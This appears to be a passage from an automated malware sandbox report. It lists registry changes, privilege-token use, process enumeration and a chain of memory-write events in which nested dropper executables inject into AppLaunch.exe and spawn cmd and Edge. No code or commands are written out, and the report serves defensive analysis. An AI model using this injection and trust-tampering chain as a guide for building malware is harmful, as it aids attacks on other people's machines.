Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1088 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1088 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1088 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1200 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1200 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 1200 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 3184 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3184 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 3184 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 2004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2004 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2004 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 2004 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe
PID 3184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe
PID 3184 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4392 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe
PID 1200 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe
PID 1200 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1088 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe
PID 1088 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe
PID 1088 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe
PID 4732 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe C:\Windows\system32\cmd.exe
PID 4732 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 760 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1116 wrote to memory of 4356 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
